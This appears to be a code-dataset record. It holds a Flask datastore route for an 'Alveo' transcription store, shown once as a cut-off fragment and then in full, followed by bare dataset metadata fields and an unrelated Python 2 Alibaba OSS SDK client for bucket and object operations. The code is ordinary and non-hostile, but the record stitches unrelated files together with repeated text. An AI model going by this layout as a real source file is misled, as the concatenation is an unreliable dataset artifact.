model.storage_spec = storage_spec model.timestamp = datetime.datetime.now() db.session.commit() return { 'id': model.id, 'version': model.versions.count() - 1, 'timestamp': model.timestamp, 'alias': alias } store_route = AlveoStoreRoute.as_view('/alveo/datastore/') def validate_data(data): if not isinstance(data, list): abort(400, 'Expected a list of JSON objects as the data type') supported_keys = SUPPORTED_STORAGE_KEYS.keys() for entry in data: keys = entry.keys() for key in keys: if key not in supported_keys: abort(400, 'Invalid/unsupported key \'%s\'' % key) expected_type = SUPPORTED_STORAGE_KEYS[key]['type'] if not isinstance(entry[key], expected_type): abort(400, 'Invalid type for key \'%s\', expected %s got %s' % (key, expected_type.__name__, type(entry[key]).__name__)) for key in supported_keys: if SUPPORTED_STORAGE_KEYS[key]['required']: if key not in keys: abort(400, 'Required key is missing: %s' % key)
import json import uuid import datetime from flask import g, abort from application import db from application.users.model import User from application.datastore.model import Datastore from application.alveo.module import DOMAIN, SUPPORTED_STORAGE_KEYS from application.auth.required import auth_required from application.datastore.view_wrappers.store import StoreWrapper from application import limiter class AlveoStoreRoute(StoreWrapper): decorators = [ auth_required, limiter.limit("1000 per minute"), limiter.limit("20000 per hour"), limiter.limit("100000 per day") ] def _processor_get(self, object_id, user_id=None, version=None): query = Datastore.query.filter(Datastore.id == object_id).first() if query is None: abort(404, 'No match for the provided id') user = User.query.filter(User.id == query.user_id).first() if not user.domain == DOMAIN: abort( 403, 'You don\'t have permission to read the storage of an external user') base_query = query if version != None: try: query = query.versions[version] except: abort(404, 'Version doesn\'t exist for provided id') else: version = query.versions.count() - 1 data = json.loads(query.value.decode()) original_author = base_query.versions[0].user total_versions = base_query.versions.count() version_author = query.user return { 'id': query.id, 'key': str(query.key.split(':', 1)[1]), 'version': version, 'total_versions': total_versions, 'transcription': data, 'alias': query.alias, 'annotations_total': len(data), 'timestamp': query.timestamp.isoformat(), 'storage_spec': query.storage_spec, 'author': { 'original': { 'ats_id': original_author.id, 'domain': original_author.domain, 'remote_id': original_author.remote_id }, 'version': { 'ats_id': version_author.id, 'domain': version_author.domain, 'remote_id': version_author.remote_id } } } def _processor_post(self, key, value, storage_spec, alias=None): if key is None or len(key) < 2: abort(400, 'Key is invalid or too short') if alias is None or len(alias) < 1: alias = "default" validate_data(value) key = '%s:%s' % (DOMAIN, key) model = Datastore.query.filter( Datastore.key == key).filter( Datastore.alias == alias).filter( Datastore.user_id == g.user.id).first() data = json.dumps(value) if model is None: model = Datastore(key, data, storage_spec, g.user, alias) db.session.add(model) else: model.set_value(data) model.storage_spec = storage_spec model.timestamp = datetime.datetime.now() db.session.commit() return { 'id': model.id, 'version': model.versions.count() - 1, 'timestamp': model.timestamp, 'alias': alias } store_route = AlveoStoreRoute.as_view('/alveo/datastore/') def validate_data(data): if not isinstance(data, list): abort(400, 'Expected a list of JSON objects as the data type') supported_keys = SUPPORTED_STORAGE_KEYS.keys() for entry in data: keys = entry.keys() for key in keys: if key not in supported_keys: abort(400, 'Invalid/unsupported key \'%s\'' % key) expected_type = SUPPORTED_STORAGE_KEYS[key]['type'] if not isinstance(entry[key], expected_type): abort(400, 'Invalid type for key \'%s\', expected %s got %s' % (key, expected_type.__name__, type(entry[key]).__name__)) for key in supported_keys: if SUPPORTED_STORAGE_KEYS[key]['required']: if key not in keys: abort(400, 'Required key is missing: %s' % key)
none
1
2.031347
2
ossync/sdk/oss_api.py
lanbaba/Ossyncone
22
6629022
<reponame>lanbaba/Ossyncone #!/usr/bin/env python #coding=utf-8 # Copyright (c) 2011, Alibaba Cloud Computing # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. import httplib import time import base64 import urllib import StringIO import sys try: from oss.oss_util import * except: from oss_util import * try: from oss.oss_xml_handler import * except: from oss_xml_handler import * class OssAPI: ''' A simple OSS API ''' DefaultContentType = 'application/octet-stream' provider = PROVIDER __version__ = '0.3.2' Version = __version__ AGENT = 'oss-python%s (%s)' % (__version__, sys.platform) def __init__(self, host, access_id, secret_access_key='', port=80, is_security=False): self.SendBufferSize = 8192 self.RecvBufferSize = 1024*1024*10 self.host = get_second_level_domain(host) self.port = port self.access_id = access_id self.secret_access_key = secret_access_key self.show_bar = False self.is_security = is_security self.retry_times = 5 self.agent = self.AGENT self.debug = False def set_debug(self, is_debug): if is_debug: self.debug = True def set_retry_times(self, retry_times=5): self.retry_times = retry_times def set_send_buf_size(self, buf_size): try: self.SendBufferSize = (int)(buf_size) except ValueError: pass def set_recv_buf_size(self, buf_size): try: self.RecvBufferSize = (int)(buf_size) except ValueError: pass def get_connection(self, tmp_host=None): host = '' port = 80 timeout = 10 if not tmp_host: tmp_host = self.host host_port_list = tmp_host.split(":") if len(host_port_list) == 1: host = host_port_list[0].strip() elif len(host_port_list) == 2: host = host_port_list[0].strip() port = int(host_port_list[1].strip()) if self.is_security or port == 443: self.is_security = True if sys.version_info >= (2, 6): return httplib.HTTPSConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPSConnection(host=host, port=port) else: if sys.version_info >= (2, 6): return httplib.HTTPConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPConnection(host=host, port=port) def sign_url_auth_with_expire_time(self, method, url, headers=None, resource="/", timeout=60, params=None): ''' Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type url: string :param:HTTP address of bucket or object, eg: http://HOST/bucket/object :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object :type timeout: int :param Returns: signature url. ''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value sign_url = append_param(url, params) return sign_url def sign_url(self, method, bucket, object, timeout=60, headers=None, params=None): ''' Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type bucket: string :param: :type object: string :param: :type timeout: int :param :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature url. ''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/%s%s" % (bucket, object, get_resource(params)) auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value url = '' if self.is_security: if is_ip(self.host): url = "https://%s/%s/%s" % (self.host, bucket, object) else: url = "https://%s.%s/%s" % (bucket, self.host, object) else: if is_ip(self.host): url = "http://%s/%s/%s" % (self.host, bucket, object) else: url = "http://%s.%s/%s" % (bucket, self.host, object) sign_url = append_param(url, params) return sign_url def _create_sign_for_normal_auth(self, method, headers=None, resource="/"): ''' NOT public API Create the authorization for OSS based on header input. it should be put into "Authorization" parameter of header. :type method: string :param:one of PUT, GET, DELETE, HEAD :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature string ''' auth_value = "%s %s:%s" % (self.provider, self.access_id, get_assign(self.secret_access_key, method, headers, resource, None, self.debug)) return auth_value def bucket_operation(self, method, bucket, headers=None, params=None): return self.http_request(method, bucket, '', headers, '', params) def object_operation(self, method, bucket, object, headers=None, body='', params=None): return self.http_request(method, bucket, object, headers, body, params) def http_request(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' retry = 5 res = None while retry > 0: retry -= 1 tmp_bucket = bucket tmp_object = object tmp_headers = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() tmp_params = {} if params and isinstance(params, dict): tmp_params = params.copy() res = self.http_request_with_redirect(method, tmp_bucket, tmp_object, tmp_headers, body, tmp_params) if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) else: return res return res def http_request_with_redirect(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' if not params: params = {} if not headers: headers = {} if isinstance(object, unicode): object = object.encode('utf-8') if not bucket: resource = "/" headers['Host'] = self.host else: headers['Host'] = "%s.%s" % (bucket, self.host) resource = "/%s/" % bucket resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if is_ip(self.host): url = "/%s/%s" % (bucket, object) if not bucket: url = "/%s" % object headers['Host'] = self.host url = append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) headers['Date'] = date headers['Authorization'] = self._create_sign_for_normal_auth(method, headers, resource) headers['User-Agent'] = self.agent if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.request(method, url, body, headers) return conn.getresponse() def get_service(self, headers=None): ''' List all buckets of user ''' return self.list_all_my_buckets(headers) def list_all_my_buckets(self, headers=None): ''' List all buckets of user type headers: dict :param Returns: HTTP Response ''' method = 'GET' bucket = '' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def get_bucket_acl(self, bucket): ''' Get Access Control Level of bucket :type bucket: string :param Returns: HTTP Response ''' method = 'GET' object = '' headers = {} body = '' params = {} params['acl'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket_location(self, bucket): ''' Get Location of bucket ''' method = 'GET' object = '' headers = {} body = '' params = {} params['location'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object that in bucket ''' return self.list_bucket(bucket, prefix, marker, delimiter, maxkeys, headers) def list_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object that in bucket :type bucket: string :param :type prefix: string :param :type marker: string :param :type delimiter: string :param :type maxkeys: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['prefix'] = prefix params['marker'] = marker params['delimiter'] = delimiter params['max-keys'] = maxkeys return self.http_request(method, bucket, object, headers, body, params) def create_bucket(self, bucket, acl='', headers=None): ''' Create bucket ''' return self.put_bucket(bucket, acl, headers) def put_bucket(self, bucket, acl='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl method = 'PUT' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def put_bucket_with_location(self, bucket, acl='', location='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type location: string :param: :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl params = {} body = '' if location != '': body = r'<CreateBucketConfiguration>' body += r'<LocationConstraint>' body += location body += r'</LocationConstraint>' body += r'</CreateBucketConfiguration>' method = 'PUT' object = '' return self.http_request(method, bucket, object, headers, body, params) def delete_bucket(self, bucket, headers=None): ''' Delete bucket :type bucket: string :param Returns: HTTP Response ''' method = 'DELETE' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def put_object_with_data(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content ''' return self.put_object_from_string(bucket, object, input_content, content_type, headers, params) def put_object_from_string(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content :type bucket: string :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers['Content-Type'] = content_type headers['Content-Length'] = str(len(input_content)) fp = StringIO.StringIO(input_content) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def _open_conn_to_put_object(self, bucket, object, filesize, content_type=DefaultContentType, headers=None, params=None): ''' NOT public API Open a connectioon to put object :type bucket: string :param :type filesize: int :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: Initialized HTTPConnection ''' if not params: params = {} if not headers: headers = {} method = 'PUT' if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/" % bucket if not bucket: resource = "/" resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if bucket: headers['Host'] = "%s.%s" % (bucket, self.host) else: headers['Host'] = self.host if is_ip(self.host): url = "/%s/%s" % (bucket, object) headers['Host'] = self.host url = append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.putrequest(method, url) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') headers["Content-Type"] = content_type headers["Content-Length"] = filesize headers["Date"] = date headers["Expect"] = "100-Continue" headers['User-Agent'] = self.agent for k in headers.keys(): conn.putheader(str(k), str(headers[k])) if '' != self.secret_access_key and '' != self.access_id: auth = self._create_sign_for_normal_auth(method, headers, resource) conn.putheader("Authorization", auth) conn.endheaders() return conn def put_object_from_file(self, bucket, object, filename, content_type='', headers=None, params=None): ''' put object into bucket, the content of object is read from file :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' fp = open(filename, 'rb') if not content_type: content_type = get_content_type_by_filename(filename) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def view_bar(self, num=1, sum=100): rate = float(num) / float(sum) rate_num = int(rate * 100) print '\r%d%% ' % (rate_num), sys.stdout.flush() def put_object_from_fp(self, bucket, object, fp, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is read from file pointer :type bucket: string :param :type object: string :param :type fp: file :param: the pointer of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp.seek(os.SEEK_SET, os.SEEK_END) filesize = fp.tell() fp.seek(os.SEEK_SET) conn = self._open_conn_to_put_object(bucket, object, filesize, content_type, headers, params) totallen = 0 l = fp.read(self.SendBufferSize) retry_times = 0 while len(l) > 0: if retry_times > 100: print "retry too many times" raise try: conn.send(l) retry_times = 0 except: retry_times += 1 continue totallen += len(l) if self.show_bar: self.view_bar(totallen, filesize) l = fp.read(self.SendBufferSize) res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return self.put_object_from_fp(bucket, tmp_object, fp, content_type, tmp_headers, tmp_params) return res def get_object(self, bucket, object, headers=None, params=None): ''' Get object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' body = '' return self.http_request(method, bucket, object, headers, body, params) def get_object_to_file(self, bucket, object, filename, headers=None): ''' Get object and write the content of object into a file :type bucket: string :param :type object: string :param :type filename: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' res = self.get_object(bucket, object, headers) totalread = 0 if res.status / 100 == 2: header = {} header = convert_header2map(res.getheaders()) filesize = safe_get_element("content-length", header) f = file(filename, 'wb') data = '' while True: data = res.read(self.RecvBufferSize) if data: f.write(data) totalread += len(data) if self.show_bar: self.view_bar(totalread, filesize) else: break f.close() # TODO: get object with flow return res def delete_object(self, bucket, object, headers=None): ''' Delete object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'DELETE' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def head_object(self, bucket, object, headers=None): ''' Head object, to get the meta message of object without the content :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'HEAD' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def post_object_group(self, bucket, object, object_group_msg_xml, headers=None, params=None): ''' Post object group, merge all objects in object_group_msg_xml into one object :type bucket: string :param :type object: string :param :type object_group_msg_xml: string :param: xml format string, like <CreateFileGroup> <Part> <PartNumber>N</PartNumber> <FileName>objectN</FileName> <Etag>"47BCE5C74F589F4867DBD57E9CA9F808"</Etag> </Part> </CreateFileGroup> :type headers: dict :param: HTTP header :type params: dict :param: parameters Returns: HTTP Response ''' method = 'POST' if not headers: headers = {} if not params: params = {} if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type body = object_group_msg_xml params['group'] = '' headers['Content-Length'] = str(len(body)) return self.http_request(method, bucket, object, headers, body, params) def get_object_group_index(self, bucket, object, headers=None): ''' Get object group_index :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers["x-oss-file-group"] = '' method = 'GET' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def upload_part_from_file_given_pos(self, bucket, object, filename, offset, partsize, upload_id, part_number, headers=None, params=None): if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file_given_pos(bucket, object, filename, offset, partsize, content_type, headers, params) def put_object_from_file_given_pos(self, bucket, object, filename, offset, partsize, content_type='', headers=None, params=None): ''' Put object into bucket, the content of object is read from given posision of filename :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type offset: int :param: the given position of file :type partsize: int :param: the size of read content :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp = open(filename, 'rb') if offset > os.path.getsize(filename): fp.seek(os.SEEK_SET, os.SEEK_END) else: fp.seek(offset) if not content_type: content_type = get_content_type_by_filename(filename) conn = self._open_conn_to_put_object(bucket, object, partsize, content_type, headers, params) left_len = partsize while True: if left_len <= 0: break elif left_len < self.SendBufferSize: buffer_content = fp.read(left_len) else: buffer_content = fp.read(self.SendBufferSize) if buffer_content: conn.send(buffer_content) left_len = left_len - len(buffer_content) fp.close() res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return self.put_object_from_file_given_pos(bucket, tmp_object, filename, offset, partsize , content_type, tmp_headers, tmp_params) return res def upload_large_file(self, bucket, object, filename, thread_num=10, max_part_num=1000, headers=None): ''' Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param Returns: HTTP Response ''' #split the large file into 1000 parts or many parts #get part_msg_list if not headers: headers = {} if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num retry_times = self.retry_times while(retry_times >= 0): try: threadpool = [] for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = PutObjectGroupWorker(oss, bucket, filename, part_msg_list[begin:end], self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times = retry_times -1 if -1 >= retry_times: print "after retry %s, failed, upload large file failed!" % retry_times return #get xml string that contains msg of object group object_group_msg_xml = create_object_group_msg_xml(part_msg_list) content_type = get_content_type_by_filename(filename) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') if not headers.has_key('Content-Type'): headers['Content-Type'] = content_type return self.post_object_group(bucket, object, object_group_msg_xml, headers) def copy_object(self, source_bucket, source_object, target_bucket, target_object, headers=None): ''' Copy object :type source_bucket: string :param :type source_object: string :param :type target_bucket: string :param :type target_object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if isinstance(source_object, unicode): source_object = source_object.encode('utf-8') source_object = urllib.quote(source_object) headers['x-oss-copy-source'] = "/%s/%s" % (source_bucket, source_object) method = 'PUT' body = '' params = {} return self.http_request(method, target_bucket, target_object, headers, body, params) def init_multi_upload(self, bucket, object, headers=None, params=None): ''' Init multi upload :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'POST' body = '' params['uploads'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_all_parts(self, bucket, object, upload_id, max_parts=None, part_number_marker=None): ''' List all upload parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type max_parts: int :param :type part_number_marker: string :param Returns: HTTP Response ''' method = 'GET' headers = {} body = '' params = {} params['uploadId'] = upload_id if max_parts: params['max-parts'] = max_parts if part_number_marker: params['part-number-marker'] = part_number_marker return self.http_request(method, bucket, object, headers, body, params) def get_all_multipart_uploads(self, bucket, delimiter=None, max_uploads=None, key_marker=None, prefix=None, upload_id_marker=None, headers=None): ''' List all upload_ids and their parts :type bucket: string :param :type delimiter: string :param :type max_uploads: string :param :type key_marker: string :param :type prefix: string :param :type upload_id_marker: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['uploads'] = '' if delimiter: params['delimiter'] = delimiter if max_uploads: params['max-uploads'] = max_uploads if key_marker: params['key-marker'] = key_marker if prefix: params['prefix'] = prefix if upload_id_marker: params['upload-id-marker'] = upload_id_marker return self.http_request(method, bucket, object, headers, body, params) def upload_part(self, bucket, object, filename, upload_id, part_number, headers=None, params=None): ''' Upload the content of filename as one part of given upload_id :type bucket: string :param :type object: string :param :type filename: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file(bucket, object, filename, content_type, headers, params) def upload_part_from_string(self, bucket, object, data, upload_id, part_number, headers=None, params=None): ''' Upload the content of string as one part of given upload_id :type bucket: string :param :type object: string :param :type data: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' fp = StringIO.StringIO(data) return self.put_object_from_fp(bucket, object, fp, content_type, headers, params) def complete_upload(self, bucket, object, upload_id, part_msg_xml, headers=None, params=None): ''' Finish multiupload and merge all the parts in part_msg_xml as a object. :type bucket: string :param :type object: string :param :type upload_id: string :param :type part_msg_xml: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' body = part_msg_xml headers['Content-Length'] = str(len(body)) params['uploadId'] = upload_id if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type return self.http_request(method, bucket, object, headers, body, params) def cancel_upload(self, bucket, object, upload_id, headers=None, params=None): ''' Cancel multiupload and delete all parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'DELETE' if isinstance(upload_id, unicode): upload_id = upload_id.encode('utf-8') params['uploadId'] = upload_id body = '' return self.http_request(method, bucket, object, headers, body, params) def multi_upload_file(self, bucket, object, filename, upload_id='', thread_num=10, max_part_num=10000, headers=None, params=None): ''' Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type upload_id: string :param :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param :type params: dict :param Returns: HTTP Response ''' #get init upload_id if not upload_id: res = self.init_multi_upload(bucket, object, headers, params) body = res.read() if res.status == 200: h = GetInitUploadIdXml(body) upload_id = h.upload_id else: err = ErrorXml(body) raise Exception("%s, %s" %(res.status, err.msg)) if not upload_id: raise Exception("-1, Cannot get upload id.") #split the large file into 1000 parts or many parts #get part_msg_list if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) logger = getlogger(self.debug) logger.info("bucket:%s, object:%s, upload_id is: %s, split_number:%d" % (bucket, object, upload_id, len(part_msg_list))) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num #list part to get a map upload_retry_times = self.retry_times while(upload_retry_times >= 0): uploaded_part_map = {} oss = OssAPI(self.host, self.access_id, self.secret_access_key) uploaded_part_map = get_part_map(oss, bucket, object, upload_id) retry_times = self.retry_times while(retry_times >= 0): threadpool = [] try: for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = UploadPartWorker(oss, bucket, object, upload_id, filename, part_msg_list[begin:end], uploaded_part_map, self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times -= 1 if -1 >= retry_times: raise Exception("-2, after retry %s, failed, multi upload part failed! upload_id:%s" % (self.retry_times, upload_id)) #get xml string that contains msg of part part_msg_xml = create_part_xml(part_msg_list) #complete upload res = self.complete_upload(bucket, object, upload_id, part_msg_xml, headers, params) if res.status == 200: break upload_retry_times -= 1 if upload_retry_times < 0: raise Exception("-3, after retry %s, failed, multi upload file failed! upload_id:%s" % (self.retry_times, upload_id)) return res def delete_objects(self, bucket, object_list=None, headers=None, params=None): ''' Batch delete objects :type bucket: string :param: :type object_list: list :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) return self.batch_delete_object(bucket, object_list_xml, headers, params) def batch_delete_object(self, bucket, object_list_xml, headers=None, params=None): ''' Delete the objects in object_list_xml :type bucket: string :param: :type object_list_xml: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' object = '' body = object_list_xml headers['Content-Length'] = str(len(body)) params['delete'] = '' base64md5 = base64.encodestring(md5.new(body).digest()) if base64md5[-1] == '\n': base64md5 = base64md5[0:-1] headers['Content-MD5'] = base64md5 return self.http_request(method, bucket, object, headers, body, params) def list_objects(self, bucket, prefix=''): ''' :type bucket: string :param: :type prefix: string :param: Returns: a list that contains the objects in bucket with prefix ''' get_instance = GetAllObjects() marker_input = '' object_list = [] oss = OssAPI(self.host, self.access_id, self.secret_access_key) (object_list, marker_output) = get_instance.get_object_in_bucket(oss, bucket, marker_input, prefix) return object_list def batch_delete_objects(self, bucket, object_list=None): ''' :type bucket: string :param: :type object_list: object name list :param: Returns: True or False ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) try: res = self.batch_delete_object(bucket, object_list_xml) if res.status / 100 == 2: return True except: pass return False def get_object_info(self, bucket, object, headers=None, params=None): ''' Get object information :type bucket: string :param: :type object: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'GET' body = '' params['objectInfo'] = '' return self.http_request(method, bucket, object, headers, body, params)
